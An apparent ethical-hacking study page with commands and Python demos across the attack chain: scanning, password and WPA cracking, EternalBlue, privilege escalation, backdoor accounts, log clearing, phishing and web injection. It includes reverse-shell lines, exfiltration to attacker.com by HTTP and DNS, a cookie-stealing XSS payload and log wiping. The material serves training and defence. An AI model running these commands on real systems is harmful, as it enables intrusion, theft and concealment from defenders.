> For the complete documentation index, see [llms.txt](https://mainekhacker-1.gitbook.io/mainekhacker/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://mainekhacker-1.gitbook.io/mainekhacker/complete-system-hacking-notes.md).

# Complete System Hacking Notes

## Complete System Hacking Notes for Ethical Hackers

### 1. Introduction to System Hacking

**System Hacking** involves identifying and exploiting vulnerabilities in computer systems to assess security weaknesses. Ethical hackers perform these activities with proper authorization to help organizations improve their security posture.

**Legal Framework:**

* Always obtain written permission before testing
* Operate within defined scope and rules of engagement
* Follow responsible disclosure practices

***

### 2. Footprinting and Reconnaissance

#### Passive Reconnaissance

Gathering information without sending packets to the target's own systems: registrar records, public DNS, search engines and leaked data. Nothing shows up in the target's logs.

Example - WHOIS Lookup:

```bash
whois example.com
# Returns: Domain owner, registrar, name servers, creation date
```

Example - DNS Enumeration:

```bash
nslookup example.com
dig example.com A
dig example.com MX
dig example.com NS
dig example.com ANY
# ANY is unreliable: many servers answer it minimally (RFC 8482), so query record types individually
# Zone transfer check against each authoritative server (should be refused); this one talks to the target's own name server, so it is no longer passive
dig axfr example.com @ns1.example.com
# Reveals: IP addresses, mail servers, DNS records
```

#### Active Reconnaissance

Sending packets to the target's own systems. It can be logged and alerted on, so do it only inside the authorized scope.

Example - Ping Sweep:

```bash
ping -c 1 192.168.1.1
# Checks whether one host answers ICMP echo
# Sweep a whole subnet (host discovery only, no port scan)
nmap -sn 192.168.1.0/24
# On the local segment nmap uses ARP for this, so hosts that drop ICMP still show up
```

***

### 3. Scanning and Enumeration

#### Network Scanning

Example - Nmap TCP Connect Scan:

```bash
nmap -sT 192.168.1.100
# Completes the full TCP handshake, so the service sees and may log a real connection; works without root
```

Example - Stealth SYN Scan:

```bash
nmap -sS 192.168.1.100
# Half-open scan: sends SYN, answers the SYN/ACK with RST instead of completing the handshake; needs root (raw sockets)
# Quieter in application logs, but any IDS or netflow baseline still spots the burst of bare SYNs
```

Example - Service Version Detection:

```bash
nmap -sV -p 80,443,22 192.168.1.100
# Output: 22/tcp open ssh OpenSSH 7.4
# 80/tcp open http Apache 2.4.6
```
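What `nmap -sT` does under the hood, as an added example that is not part of the original notes: one full `connect()` per port, classified as open, closed or filtered, with a banner grab on the open ones. It starts its own throwaway listener on 127.0.0.1 so it runs offline; the banner text and the port choice are constructed for the demo.

```python
import socket
import threading


def start_listener(host="127.0.0.1"):
    """Start a background TCP listener on an OS-chosen port; returns (sock, port).

    Stands in for a live service on the target. It answers every connection
    with a constructed banner, so a connect() from the scanner completes the
    three-way handshake and has something to read.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:  # listener was closed, stop serving
                return
            conn.sendall(b"SSH-2.0-OpenSSH_7.4\r\n")  # constructed banner
            conn.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv, port


def pick_closed_port(host="127.0.0.1"):
    """Reserve a free port and release it: nothing listens there, so it is 'closed'."""
    tmp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tmp.bind((host, 0))
    port = tmp.getsockname()[1]
    tmp.close()
    return port


def probe(host, port, timeout=0.5):
    """Full TCP connect to one port (what -sT does). Returns (state, banner).

    open     - handshake completed (the service will log this connection)
    closed   - target answered with RST
    filtered - no answer before the timeout, typical of a firewall that drops
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
    except ConnectionRefusedError:
        s.close()
        return "closed", b""
    except OSError:  # includes the timeout
        s.close()
        return "filtered", b""
    try:
        banner = s.recv(128)  # many services talk first (SSH, FTP, SMTP)
    except OSError:
        banner = b""
    finally:
        s.close()
    return "open", banner.strip()


def scan(host, ports, timeout=0.5):
    """Scan the given ports; returns {port: (state, banner)}."""
    return {p: probe(host, p, timeout) for p in ports}


if __name__ == "__main__":
    srv, live = start_listener()
    for port, (state, banner) in scan("127.0.0.1", [live, pick_closed_port()]).items():
        print(f"{port}/tcp {state} {banner.decode(errors='replace')}")
    srv.close()
```

The three states map directly onto what nmap reports: a refused connection means a host is up but nothing listens, a timeout usually means a firewall is dropping, and an immediate banner is the same information `-sV` starts from.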

#### Enumeration

Example - NetBIOS Enumeration:

```bash
nbtscan 192.168.1.0/24
# Reveals: Computer names, workgroups, MAC addresses
```

Example - SNMP Enumeration:

```bash
snmpwalk -v2c -c public 192.168.1.1
# "public" is the default read community; try -v1 as well if v2c is refused
# Extracts: system information, network interfaces, running processes
# Walking the whole tree is slow; target a subtree, e.g. process names (hrSWRunName):
snmpwalk -v2c -c public 192.168.1.1 1.3.6.1.2.1.25.4.2.1.2
```

***

### 4. Gaining Access

#### Password Cracking

Example - Dictionary Attack with John the Ripper:

```bash
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
# Attempts every password in the wordlist; john guesses the hash type, set --format=raw-md5 (etc.) if it guesses wrong
# Example result: admin:password123
john --show hashes.txt
# Lists what has been cracked so far (results are kept in ~/.john/john.pot)
```

Example - Brute Force with Hashcat:

```bash
hashcat -m 0 -a 3 hash.txt ?a?a?a?a?a?a
# -m 0: MD5 hash type
# -a 3: Brute-force (mask) attack
# ?a: All 95 printable ASCII characters (uppercase, lowercase, digits, symbols, space)
# Six ?a positions is 95^6, about 7.4e11 candidates: feasible for MD5 on a GPU, hopeless for bcrypt or PBKDF2
```
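The two attack modes above implemented in a few dozen lines, as an added example that is not code from the original notes: a dictionary attack in the style of `john --wordlist` and a mask attack that expands hashcat's `?l ?u ?d ?s ?a` charsets, both against unsalted MD5 (`-m 0`). The `user:hash` lines and the tiny wordlist are constructed here; the point is the lookup-by-hash structure and the keyspace arithmetic, not speed.

```python
import hashlib
import itertools
import string

# hashcat's built-in charsets (?a is all 95 printable ASCII characters)
CHARSETS = {
    "l": string.ascii_lowercase,
    "u": string.ascii_uppercase,
    "d": string.digits,
    "s": " " + string.punctuation,
    "a": string.ascii_letters + string.digits + " " + string.punctuation,
}

# Constructed input in the user:hash layout the john example uses
SAMPLE_HASHES = "\n".join([
    "admin:" + hashlib.md5(b"password123").hexdigest(),
    "ops:" + hashlib.md5(b"1984").hexdigest(),
    "svc:" + hashlib.md5(b"xK9#qL2!").hexdigest(),
])
SAMPLE_WORDLIST = ["letmein", "123456", "password123", "qwerty"]  # stand-in for rockyou.txt


def md5_hex(candidate: str) -> str:
    return hashlib.md5(candidate.encode()).hexdigest()


def parse_hashfile(text: str) -> dict:
    """'user:hash' per line -> {user: hash}; blank or malformed lines are skipped."""
    targets = {}
    for line in text.splitlines():
        line = line.strip()
        if ":" not in line:
            continue
        user, h = line.split(":", 1)
        targets[user] = h.strip().lower()
    return targets


def wordlist_attack(targets: dict, words) -> dict:
    """Dictionary attack: hash each word once, look it up against every target."""
    wanted = {h: user for user, h in targets.items()}
    cracked = {}
    for word in words:
        h = md5_hex(word)
        if h in wanted:
            cracked[wanted[h]] = word
    return cracked


def mask_pieces(mask: str) -> list:
    """'?d?d?l' -> [digits, digits, lowercase]; '??' is a literal '?', anything else a literal."""
    pieces, i = [], 0
    while i < len(mask):
        if mask[i] == "?" and i + 1 < len(mask):
            nxt = mask[i + 1]
            if nxt in CHARSETS:
                pieces.append(CHARSETS[nxt])
                i += 2
                continue
            if nxt == "?":
                pieces.append("?")
                i += 2
                continue
        pieces.append(mask[i])
        i += 1
    return pieces


def mask_keyspace(mask: str) -> int:
    """Number of candidates the mask expands to (95**6 for ?a?a?a?a?a?a)."""
    n = 1
    for p in mask_pieces(mask):
        n *= len(p)
    return n


def mask_attack(targets: dict, mask: str) -> dict:
    """Brute force every candidate the mask describes, like hashcat -a 3."""
    wanted = {h: user for user, h in targets.items()}
    cracked = {}
    for combo in itertools.product(*mask_pieces(mask)):
        candidate = "".join(combo)
        h = md5_hex(candidate)
        if h in wanted:
            cracked[wanted[h]] = candidate
            if len(cracked) == len(wanted):
                break
    return cracked


if __name__ == "__main__":
    targets = parse_hashfile(SAMPLE_HASHES)
    print("wordlist:", wordlist_attack(targets, SAMPLE_WORDLIST))
    print("mask ?d?d?d?d:", mask_attack(targets, "?d?d?d?d"))
    print("keyspace of ?a?a?a?a?a?a:", mask_keyspace("?a?a?a?a?a?a"))
```

Because the hashes are unsalted, one MD5 per candidate tests every target at once; that is exactly what a per-user salt takes away, and a slow KDF multiplies the cost of each candidate on top of it.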

#### Exploitation

Example - Using Metasploit:

```bash
msfconsole
# Confirm the host is actually vulnerable first: the exploit can crash an unpatched target
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.1.50
run
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.50
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.10
exploit
# Exploits the EternalBlue vulnerability (MS17-010) in Windows SMBv1
```

***

### 5. Privilege Escalation

#### Linux Privilege Escalation

Example - Exploiting SUID Binaries:

```bash
# Find root-owned SUID binaries (they run with the owner's effective uid, i.e. root)
find / -type f -perm -4000 -user root 2>/dev/null
# If /usr/bin/find has the SUID bit, -exec runs the command as root:
find . -exec whoami \; -quit
# Prints "root"; -quit stops after the first match instead of running once per file
# Escalate to a root shell (-p keeps the effective uid; without it sh/bash drop back to your own uid)
find . -exec /bin/sh -p \; -quit
# Check every hit against GTFOBins; passwd, sudo, su and friends are SUID by design and not useful on their own
```
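The `find / -perm -4000` step as a script that also does the triage, added here as an example and not part of the original notes: walk a tree, keep regular files with the setuid bit, then flag the ones owned by the privileged uid whose name is on a short list of binaries known to hand over a shell. The list is a hand-picked assumption for the demo (GTFOBins is the real catalogue), and `demo()` builds a constructed tree in a temp directory so the script is testable without root.

```python
import os
import stat
import tempfile

# Hand-picked subset of SUID binaries that give a shell or file write while keeping
# the effective uid. Assumption for the demo; check each real hit against GTFOBins.
KNOWN_ESCALATORS = {"find", "bash", "sh", "dash", "python", "python3", "perl",
                    "vim", "env", "awk", "nmap", "cp", "mv", "tee"}


def find_suid(root="/"):
    """Walk `root`; return [(path, owner_uid)] for regular files with the setuid bit.

    Symlinks are not followed (lstat), so a link into /usr/bin cannot
    double-count a binary or escape the tree being scanned.
    """
    hits = []
    for dirpath, _, filenames in os.walk(root, onerror=lambda e: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished: the 2>/dev/null case
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append((path, st.st_uid))
    return hits


def triage(hits, privileged_uid=0):
    """Keep hits owned by the privileged uid whose name is on the escalator list."""
    return [(p, uid) for p, uid in hits
            if uid == privileged_uid and os.path.basename(p) in KNOWN_ESCALATORS]


def demo():
    """Build a constructed tree (one SUID 'find', one plain 'ls') and scan it.

    Returns (found_names, flagged_names). The files belong to the current
    user, so the demo passes os.getuid() as the 'privileged' owner.
    """
    with tempfile.TemporaryDirectory() as base:
        bindir = os.path.join(base, "usr", "bin")
        os.makedirs(bindir)
        for name, mode in (("find", 0o4755), ("ls", 0o755)):
            path = os.path.join(bindir, name)
            with open(path, "w") as f:
                f.write("#!/bin/sh\n")  # placeholder body, never executed
            os.chmod(path, mode)
        found = find_suid(base)
        return ([os.path.basename(p) for p, _ in found],
                [os.path.basename(p) for p, _ in triage(found, os.getuid())])


if __name__ == "__main__":
    for path, uid in triage(find_suid("/")):
        print(f"{path} (uid {uid})  <- check GTFOBins")
```

On a real host run `find_suid("/")` and compare the full list against a known-good baseline for that distribution: a custom SUID binary that is not on any list is usually more interesting than `find` is.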

Example - Kernel Exploit:

```bash
# Check kernel version and distribution (distributions backport fixes, so the version alone misleads)
uname -a
cat /etc/os-release
# Output: Linux 3.13.0-24-generic
# Search for exploits matching the kernel
searchsploit linux kernel 3.13
# 3.13 falls inside the Dirty COW range (CVE-2016-5195, kernels 2.6.22 up to the 4.8.3 fix)
# Kernel exploits can panic the host: agree it with the client and take a snapshot or backup first
```

#### Windows Privilege Escalation

Example - Unquoted Service Path:

```cmd
rem Find auto-start services whose image path is unquoted and outside C:\Windows
wmic service get name,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
rem wmic is deprecated on current Windows; PowerShell equivalent:
rem Get-CimInstance Win32_Service | Where-Object { $_.PathName -notmatch '^"' -and $_.PathName -match ' ' } | Select-Object Name, PathName, StartMode
rem If PathName is: C:\Program Files\My Service\service.exe
rem Windows tries C:\Program.exe, then C:\Program Files\My.exe, then the real binary
rem Drop the payload at the first candidate whose directory you can write to (check with icacls), then restart the service or reboot
```
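The same check as a parser, added here as an example that is not code from the original notes: it reads `wmic service get name,pathname,startmode` output, keeps the unquoted paths that contain a space, and lists the file names Windows would try before the real binary, in the order CreateProcess documents. `SAMPLE_WMIC` is constructed output with made-up service names; whether any candidate directory is actually writable still has to be checked on the host with `icacls`.

```python
import re

# Constructed `wmic service get name,pathname,startmode` output; service names are made up.
SAMPLE_WMIC = r"""Name      PathName                                                StartMode
Spooler   C:\Windows\System32\spoolsv.exe                         Auto
MySvc     C:\Program Files\My Service\service.exe                 Auto
Agent     "C:\Program Files\Vendor Tools\agent.exe" -k            Auto
Updater   C:\Program Files\Acme Updater\bin\upd.exe --service     Manual
"""


def parse_wmic(text):
    """Yield (name, pathname, startmode). Service names contain no spaces and the
    start mode is the last token; everything in between is the path plus arguments."""
    lines = [l.rstrip() for l in text.splitlines() if l.strip()]
    for line in lines[1:]:  # skip the header row
        name, rest = line.split(None, 1)
        pathname, mode = rest.rsplit(None, 1)
        yield name, pathname.strip(), mode


def image_path(pathname):
    """The executable part of a service command line: up to and including '.exe'."""
    m = re.match(r'^\s*"?(.*?\.exe)', pathname, re.IGNORECASE)
    return m.group(1) if m else pathname.strip()


def is_unquoted_with_spaces(pathname):
    p = pathname.strip()
    return not p.startswith('"') and " " in image_path(p)


def hijack_candidates(pathname):
    r"""File names CreateProcess tries, in order, before the real binary.

    C:\Program Files\My Service\service.exe  ->  C:\Program.exe, C:\Program Files\My.exe
    """
    image = image_path(pathname)
    return [image[:i] + ".exe" for i, ch in enumerate(image) if ch == " "]


def find_vulnerable(text, auto_only=True):
    """Services with an unquoted, space-containing image path. Each entry lists the
    paths an attacker would need write access to (verify with icacls on the host)."""
    out = []
    for name, pathname, mode in parse_wmic(text):
        if auto_only and mode.lower() != "auto":
            continue
        if is_unquoted_with_spaces(pathname):
            out.append({"name": name, "path": pathname, "mode": mode,
                        "candidates": hijack_candidates(pathname)})
    return out


if __name__ == "__main__":
    for svc in find_vulnerable(SAMPLE_WMIC, auto_only=False):
        print(f'{svc["name"]} ({svc["mode"]}): {svc["path"]}')
        for c in svc["candidates"]:
            print("   would try:", c)
```

`auto_only=False` also lists manual-start services; those matter when you can restart them yourself (`sc start`) or trigger them some other way.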

***

### 6. Maintaining Access

#### Creating Backdoors

Example - Netcat Reverse Shell:

```bash
# On attacker machine (listen; -n skips DNS lookups)
nc -lvnp 4444
# On victim machine: -e exists only in traditional netcat and ncat, not in the OpenBSD nc most distributions ship
nc 192.168.1.10 4444 -e /bin/bash
# Portable alternative using bash's /dev/tcp
bash -i >& /dev/tcp/192.168.1.10/4444 0>&1
# Connects back to the attacker, providing shell access (unencrypted, and gone after a reboot)
```

Example - Metasploit Persistence:

```bash
# After gaining a meterpreter session
# The old `run persistence` script is deprecated; the post module replaces it
run post/windows/manage/persistence_exe REXEPATH=/tmp/payload.exe STARTUP=USER
# Legacy form still found in older notes:
run persistence -X -i 10 -p 4444 -r 192.168.1.10
# -X: Start on boot
# -i: Retry the connection every 10 seconds
# Maintains access after reboot, at the cost of a file on disk and a Run key, both easy for AV/EDR to spot
```

Example - Adding User Account:

```bash
# Linux (sudo group on Debian/Ubuntu, wheel on RHEL/Fedora)
useradd -m -s /bin/bash backdoor
echo "backdoor:P@ssw0rd" | chpasswd
usermod -aG sudo backdoor
# Windows
net user backdoor P@ssw0rd /add
net localgroup administrators backdoor /add
# Loud: useradd/usermod write to auth.log, Windows logs 4720 (account created) and 4732 (added to a local group)
```

***

### 7. Covering Tracks

#### Log Manipulation

Example - Clearing Linux Logs:

```bash
# Clear bash history (it is written at logout, so also stop the shell from saving it)
history -c
unset HISTFILE
cat /dev/null > ~/.bash_history
# Truncate system logs (needs root)
> /var/log/auth.log
> /var/log/syslog
# wtmp/btmp are binary: truncate them, never write text into them (a stray newline corrupts the file and is itself a giveaway)
> /var/log/wtmp
> /var/log/btmp
# Entries already shipped to a remote syslog/SIEM are untouched, and a log that drops to zero bytes is a classic indicator
```

Example - Windows Event Log Clearing:

```powershell
# Using PowerShell
Clear-EventLog -LogName Security
Clear-EventLog -LogName System
Clear-EventLog -LogName Application
# Or using wevtutil
wevtutil cl Security
wevtutil cl System
# Clearing the Security log writes Event ID 1102 ("The audit log was cleared") as its first new entry, and Windows Event Forwarding may already have shipped everything
```

#### Timestamp Manipulation

Example - Modifying File Timestamps:

```bash
# Linux - using touch (changes mtime and atime only)
touch -t 202001011200 malicious.sh
# Sets timestamp to Jan 1, 2020, 12:00
# Copy the timestamps of a neighbouring file instead, so the value does not stand out
touch -r /etc/hostname malicious.sh
# Verify; stat also shows ctime, which touch cannot set and which still records the real change time
ls -l malicious.sh
stat malicious.sh
```

***

### 8. Data Exfiltration

Example - HTTP POST Exfiltration:

```bash
# Compress and encode data
tar -czf - /sensitive/data | base64 -w0 > data.txt
# Send via HTTP POST (--data-binary keeps the body byte for byte; -d strips newlines)
curl -X POST --data-binary @data.txt http://attacker.com/receive.php
# Plain HTTP is readable by every proxy on the path; use HTTPS to the listener and keep the data within the agreed scope
```

Example - DNS Tunneling:

```bash
# Split data into DNS queries (xxd -p emits 60 hex characters per line, under the 63-character label limit)
cat secretfile.txt | xxd -p | while read line; do dig +short "$line.attacker.com"; done
# Each query reaches the attacker's authoritative server through the victim's own resolver, so no direct connection is needed
# Noisy: thousands of unique, long, high-entropy subdomains for a single domain
```
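Both ends of the DNS tunnel above plus the detection a defender would run, as an added example that is not code from the original notes. The sender packs data into query names that respect the 63-byte label and 253-byte name limits and carries a sequence number so the receiver can reassemble; the detection flags single names with long or high-entropy labels and domains that receive an unusual number of distinct names. The domain `attacker.example`, the "registered domain is the last two labels" rule and the thresholds are assumptions; nothing is sent on the network.

```python
import base64
import math
from collections import Counter

MAX_LABEL = 63   # RFC 1035: one label is at most 63 octets
MAX_NAME = 253   # practical maximum for a full domain name


def encode(data: bytes, domain: str, label_len: int = MAX_LABEL) -> list:
    """Turn `data` into query names: <seq>.<b32>.<b32>...<domain>.

    Base32 (lower-cased, padding stripped) survives case folding by resolvers;
    hex as in the xxd example works too but carries fewer bits per label.
    The 4-hex-digit seq label lets the receiver put out-of-order queries back.
    """
    b32 = base64.b32encode(data).decode().rstrip("=").lower()
    # k labels per name such that 4 + 1 + k*label_len + (k-1) + 1 + len(domain) <= MAX_NAME
    labels_per_name = (MAX_NAME - 5 - len(domain)) // (label_len + 1)
    if labels_per_name < 1:
        raise ValueError("domain too long for this label size")
    chunk = labels_per_name * label_len
    names = []
    for seq, i in enumerate(range(0, len(b32), chunk)):
        piece = b32[i:i + chunk]
        labels = [piece[j:j + label_len] for j in range(0, len(piece), label_len)]
        names.append(f"{seq:04x}." + ".".join(labels) + "." + domain)
    return names


def decode(names, domain: str) -> bytes:
    """Receiver side: order by seq, strip the domain, join labels, base32-decode."""
    suffix = "." + domain
    parts = {}
    for name in names:
        body = name[:-len(suffix)] if name.endswith(suffix) else name
        seq, _, payload = body.partition(".")
        parts[int(seq, 16)] = payload.replace(".", "")
    b32 = "".join(parts[k] for k in sorted(parts)).upper()
    b32 += "=" * (-len(b32) % 8)  # restore the padding the sender stripped
    return base64.b32decode(b32)


def entropy(s: str) -> float:
    """Shannon entropy in bits per character."""
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(name: str) -> str:
    # Assumption for the demo: the registered domain is the last two labels.
    return ".".join(name.rstrip(".").split(".")[-2:])


def suspicious(name: str, max_label: int = 30, min_entropy: float = 3.5) -> bool:
    """Flag one query name whose subdomain labels are long or high-entropy.
    Normal hostnames (www, mail, api-eu-west-1) are short and low-entropy."""
    labels = name.rstrip(".").split(".")[:-2]
    return any(len(l) > max_label or (len(l) >= 16 and entropy(l) > min_entropy)
               for l in labels)


def noisy_domains(names, threshold: int = 50) -> set:
    """Domains that receive more than `threshold` distinct query names: a tunnel
    never repeats a name, a legitimate zone has a small, stable set."""
    seen = {}
    for name in names:
        seen.setdefault(registered_domain(name), set()).add(name)
    return {d for d, s in seen.items() if len(s) > threshold}


if __name__ == "__main__":
    secret = (b"constructed payroll export: " * 40)[:945]  # constructed file contents
    queries = encode(secret, "attacker.example")
    print(len(queries), "queries, first:", queries[0][:70], "...")
    print("round trip ok:", decode(queries, "attacker.example") == secret)
    print("flagged:", sum(suspicious(q) for q in queries), "of", len(queries))
    print("noisy domains:", noisy_domains(queries + ["www.example.com"], threshold=5))
```

The per-name check catches the encoding, the per-domain count catches the volume; a tunnel that shortens its labels to dodge the first still has to produce the thousands of unique names that trip the second.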

Example - FTP Exfiltration:

```bash
# Automated FTP upload script
ftp -n 192.168.1.10 <<EOF
user anonymous anonymous@
binary
put confidential.pdf
bye
EOF
# FTP sends credentials and file contents in clear text
```

***

### 9. Wireless Network Hacking

Example - Capturing WPA Handshake:

```bash
# Put wireless card in monitor mode (creates wlan0mon)
airmon-ng start wlan0
# Capture packets and list networks and their channels
airodump-ng wlan0mon
# Target a specific network on its channel and write the capture to capture-01.cap
airodump-ng --bssid AA:BB:CC:DD:EE:FF -c 6 -w capture wlan0mon
# Deauthenticate clients so one reconnects and the 4-way handshake is captured (add -c <client MAC> to hit one station only)
aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon
# Deauth is a denial of service against the users of that network; keep it to the agreed BSSIDs
```

Example - Cracking WPA2:

```bash
# Crack the captured handshake offline
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b AA:BB:CC:DD:EE:FF capture-01.cap
# Output: KEY FOUND! [ password123 ]
# For GPU speed, convert to hashcat's WPA format and crack with mode 22000
hcxpcapngtool -o hash.22000 capture-01.cap
hashcat -m 22000 hash.22000 /usr/share/wordlists/rockyou.txt
```
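What `aircrack-ng` computes for every wordlist entry, as an added example that is not code from the original notes: PBKDF2 over the SSID to get the PMK, the 802.11i PRF-512 with both MAC addresses and nonces to get the PTK, the HMAC-SHA1 MIC over the EAPOL frame from the first 16 bytes of the PTK (the KCK), and a comparison with the MIC found in the capture. SSID, MACs, nonces, EAPOL bytes and the passphrase are constructed here; in a real run they all come out of `capture-01.cap`.

```python
import hashlib
import hmac

# Constructed handshake parameters standing in for what airodump-ng captured.
SSID = b"CorpWiFi"
AP_MAC = bytes.fromhex("aabbccddeeff")
CLIENT_MAC = bytes.fromhex("112233445566")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
# Constructed EAPOL-Key message 2 with its 16-byte MIC field zeroed; the MIC is
# computed over exactly these bytes, so the layout itself is not parsed here.
EAPOL_FRAME = bytes.fromhex("0103005f02010a00") + bytes(8) + SNONCE + bytes(32) + bytes(16) + bytes(2)


def pmk(passphrase: str, ssid: bytes) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes).
    The 4096 iterations are why cracking is slow and why the SSID must be known."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def ptk(pmk_bytes: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512 from IEEE 802.11i: expand the PMK with both MACs and nonces to 64 bytes.
    KCK = PTK[0:16], KEK = PTK[16:32], TK = PTK[32:48]."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(5):  # 5 x 20 bytes covers the 64 needed
        out += hmac.new(pmk_bytes, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def mic(kck: bytes, eapol: bytes) -> bytes:
    """WPA2 (AKM 2) MIC: HMAC-SHA1 over the EAPOL frame, truncated to 16 bytes."""
    return hmac.new(kck, eapol, hashlib.sha1).digest()[:16]


def crack(wordlist, ssid, aa, spa, anonce, snonce, eapol, captured_mic):
    """Per candidate: PMK -> PTK -> KCK -> MIC, compare with the captured MIC."""
    for word in wordlist:
        kck = ptk(pmk(word, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(mic(kck, eapol), captured_mic):
            return word
    return None


def demo(wordlist=("letmein", "qwerty", "password123", "correcthorse")):
    """Build the 'captured' MIC from a passphrase the attacker does not know, then crack it."""
    real_passphrase = "password123"
    kck = ptk(pmk(real_passphrase, SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]
    captured = mic(kck, EAPOL_FRAME)  # this is what the capture file gives you
    return crack(wordlist, SSID, AP_MAC, CLIENT_MAC, ANONCE, SNONCE, EAPOL_FRAME, captured)


if __name__ == "__main__":
    print("KEY FOUND!" if demo() else "KEY NOT FOUND", demo())
```

The PBKDF2 step dominates: the PRF and MIC are a handful of HMACs, but every candidate passphrase costs 4096 HMAC-SHA1 rounds, which is why GPU cracking (`hashcat -m 22000`) and precomputed PMK tables for common SSIDs exist.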

***

### 10. Social Engineering

Example - Phishing Email Template:

```
From: IT Department <it@company-internal.com>
Subject: URGENT: Password Reset Required

Your password will expire in 24 hours.
Click here to reset: http://evil-site.com/reset

[Legitimate-looking login page captures credentials]
```

Example - Pretexting Call:

"Hello, this is John from IT support. We're experiencing network issues and need to verify your credentials to restore your access. Can you confirm your username?"

***

### 11. Web Application Hacking

Example - SQL Injection:

```sql
-- Login form input
-- Username: admin' OR '1'='1
-- Password: anything
-- Resulting query:
SELECT * FROM users WHERE username='admin' OR '1'='1' AND password='anything';
-- AND binds tighter than OR, so this reads username='admin' OR ('1'='1' AND password='anything'):
-- it returns the admin row whenever that account exists, not "always true" in general
-- The classic bypass comments out the password check instead:
-- Username: admin'--
SELECT * FROM users WHERE username='admin'--' AND password='anything'
```
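The bypass above run against an in-memory SQLite table, as an added example that is not code from the original notes: the string-built query is fooled by the notes' payload and by the comment trick, the same query with bound parameters is not, and the `' OR '1'='1` variant without a username fails on the vulnerable code too because of the AND/OR precedence. Users, passwords and the plain-text password column are constructed for the demo (real applications store hashes).

```python
import sqlite3


def make_db():
    """Constructed users table; plain-text passwords only so the demo stays readable."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                   [("admin", "S3cret!x"), ("alice", "hunter2")])
    return db


def login_vulnerable(db, username, password):
    """The query is built by string formatting, so the input becomes SQL."""
    sql = (f"SELECT username FROM users "
           f"WHERE username='{username}' AND password='{password}'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(db, username, password):
    """Same query with bound parameters: the input is only ever a value."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    row = db.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def demo():
    """Run each payload through both logins; returns {name: (vulnerable, safe)}."""
    db = make_db()
    payloads = {
        "admin_or_true": ("admin' OR '1'='1", "anything"),  # the notes' payload
        "blank_or_true": ("' OR '1'='1", "anything"),       # same trick without a username
        "comment_out":   ("admin'--", "anything"),          # comments out the password check
        "honest_login":  ("alice", "hunter2"),
    }
    return {k: (login_vulnerable(db, *v), login_safe(db, *v)) for k, v in payloads.items()}


if __name__ == "__main__":
    for name, (vuln, safe) in demo().items():
        print(f"{name:14} vulnerable -> {str(vuln):6} parameterized -> {safe}")
```

`blank_or_true` coming back empty on the vulnerable login is the precedence point made concrete: `'' OR ('1'='1' AND password='anything')` is false for every row, which is why real payloads either name an existing user or end with a comment.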

Example - Cross-Site Scripting (XSS):

```html
<!-- Reflected XSS in search parameter (URL-encode the payload in a real request) -->
http://vulnerable-site.com/search?q=<script>alert(document.cookie)</script>

<!-- Stored XSS in comment field: runs in every visitor's browser and ships their cookie to the attacker -->
<script>fetch('http://attacker.com/steal?cookie=' + document.cookie);</script>
<!-- Session cookies flagged HttpOnly are not readable through document.cookie; the script can still act as the user from inside the page -->
```

Example - Command Injection:

```bash
# Vulnerable ping function builds a shell command line from the ip parameter
http://site.com/ping?ip=8.8.8.8;cat%20/etc/passwd
# Server executes: ping 8.8.8.8;cat /etc/passwd
# Returns the password file contents along with the ping output
# Fix: validate the value as an IP address and pass it as a single argv element, never through a shell
```
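The vulnerable ping endpoint beside its hardened form, as an added example that is not code from the original notes. `echo` stands in for `ping` so the block runs anywhere, and the payload ends in `echo INJECTED` instead of `cat /etc/passwd`; the point is the two fixes, an allow-list check with `ipaddress` and an argv list instead of a shell string. Requires `/bin/sh` and `echo`.

```python
import ipaddress
import subprocess

INJECTION = "8.8.8.8; echo INJECTED"  # stands in for "8.8.8.8; cat /etc/passwd"


def ping_vulnerable(ip: str) -> str:
    """Builds a shell command line from user input and hands it to sh -c."""
    cmd = f"echo pinging {ip}"
    return subprocess.run(["sh", "-c", cmd], capture_output=True, text=True).stdout


def argv_only(ip: str) -> str:
    """No shell at all: the value is one argv element, so ';' is just a character."""
    return subprocess.run(["echo", "pinging", ip], capture_output=True, text=True).stdout


def validate_ip(value: str) -> str:
    """Allow-list check: the value must parse as an IPv4/IPv6 address (ValueError otherwise)."""
    return str(ipaddress.ip_address(value.strip()))


def ping_safe(ip: str) -> str:
    """Validation first, then argv; either alone blocks this payload, together they cover
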